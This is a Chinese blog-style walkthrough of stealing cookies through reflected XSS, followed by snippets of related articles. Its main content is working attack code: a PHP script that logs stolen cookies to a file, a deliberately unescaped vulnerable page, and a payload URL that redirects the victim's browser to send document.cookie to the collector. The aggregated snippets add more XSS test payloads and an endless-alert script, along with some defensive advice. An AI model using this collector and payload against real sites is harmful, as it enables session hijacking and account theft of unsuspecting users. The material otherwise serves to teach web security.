XSS跨站获取cookie

测试环境:hacker端   and   victim端

1,hacker端(hacker.php)的程序内容如下:

<?php

$cookie=$_GET[‘cookie‘];

$file=fopen("cookie.txt","a");

fwrite($file,$cookie);

fclose($file)

?>

2,受害者端(victim.php)的程序内容如下:

<html>

<head>

<title>xss跨站原理复现</title>

</head>

<body>

<form action="" method="get">

<input type="text" name="xss_input">

<input type="submit" value="提交">

</form>

<?php

[email protected]$_GET[‘xss_input‘];

echo ‘你输入的字符为<br>‘.$xss;

?>

</body>

</html>

3,hacker发给victim的payload语句如下:
http://localhost/victim.php?xss_input=<script>document.location="http://localhost/hacker.php?cookie="+document.cookie</script>
ps:第一次用的事件不是document.location,选择的是window.open事件,But,没有成功。更换浏览器也不照。

4,当victim点击hacker发送的链接后,Victim主机的cookie就被写入到hacker的cookie.txt文档中了,cookie信息也就因此丢失了,那么hacker久可以利用这个cookie信息针对victim做bulabula....

时间: 2025-01-05 13:09:19

XSS跨站获取cookie的相关文章

XSS跨站及利用

(一)软件测试环境以及搭建 测试环境:本地 XAMPP 1.7.1 测试软件:PHP168整站v5.0 软件下载地址 http://down2.php168.com/v2008.rar PHP.ini 配置: magic_quotes_gpc Off(On或者Off对持久型XSS并无没影响) ;register_globals Off ;safe_mode Off ; (二)XSS跨站基础 1.XSS攻击定义 XSS又叫CSS (Cross Site Script) ,简称跨站脚本攻击.它指的是

修复XSS跨站漏洞

XSS跨站漏洞最终形成的原因是对输入与输出没有严格过滤. 1.输入与输出 在HTML中,<,>,",',&都有比较特殊的意义.HTML标签,属性就是由这几个符合组成的.PHP中提供了 htmlspecialchars().htmlentities()函数可以把一些预定的字符转换为HTML实体. &成为& "成为" '成为' <成为< 成为> 2.HttpOnly HttpOnly对防御XSS漏洞不起作用,主要是为了解决XS

XSS跨站漏洞 加强Web安全

第1章 课程介绍简单介绍课程的内容.1-1 课程介绍 试看 第2章 基础知识在基础知识章节中主要让同学们对XSS有一个总体的概念,对XSS的原理及危害,以及XSS的类型有一个概念,这个章节中包含了 XSS介绍及原理.反射型XSS.存储型XSS.DOM型XSS等内容.2-1 XSS介绍及原理 试看2-2 反射型XSS实战及防御 试看2-3 存储型XSS实战及防御2-4 DOM型XSS实战及防御 第3章 工具使用在工具使用章节中主要让同学们对掌握挖掘XSS漏洞的一些工具使用方法,比如网站扫描,暴力测

XSS跨站测试代码大全

XSS跨站测试代码大全                                                                                   摘自:http://www.cnblogs.com/qmfsun/p/5652712.html '><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script>

WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等

核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Webshell上传.命令注入.非法HTTP协议请求.非授权文件访问等.

淘宝如何跨域获取Cookie分析

淘宝如何跨域获取Cookie分析 最近在发现使用Taobao的时候的一个小细节,于是便萌发起了写这篇文章. 当我们在 www.taobao.com 中进行登录之后,然后直接切换到 www.tmall.com 域名下,发现www.tmall.com首页的最顶部马上显示成了”您好, andyfaces“,于是便对此处的实现机制进行分析. 首先,用户名应该是存储在cookie中的,于是在taobao.com的域名中用 firefox看到用户名确实是存储在 cookie, 而tmall.com中没有存储

漫话web渗透 : xss跨站攻击day1

1.1什么是XSS跨站攻击 xss攻击并不是对服务器进行攻击,而是借助网站进行传播,攻击者精心构造的一个URL,欺骗受害者打开从而使恶意脚本在受害者计算机中悄悄运行1.2XSS实例 首先我们看一个简单的xss实例 <html> <head>this is a xss test</head> <body> <script>alert("xss")</script> </body> </html>

用shell脚本批量进行xss跨站攻击请求

由于执行的xss攻击请求他多了,初步估计要执行83次,而且还要执行3篇,如果手工一个一个去执行,说出去,我还配叫自动化大师吗: 有鉴于此,边打算自己编写一个脚本进行批量执行: 而短脚本的编写,非shell莫属,想到做到: 首先附上xss跨站攻击的请求报文: POST /web/show.asp?id=1327 HTTP/1.1 Host: 192.168.26.xxx Connection: close Accept: image/gif, image/jpeg, image/pjpeg, im

web安全性测试——XSS跨站攻击

1.跨站攻击含义 XSS:(Cross-site scripting)全称“跨站脚本”,是注入攻击的一种.其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本.这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到了页面上,其他用户访问这个页面的时候就会运行这些脚本. 一个永远关不掉的窗口while (true) { alert("你关不掉我~"); } CSRF:跨站请求伪造(Cross-site request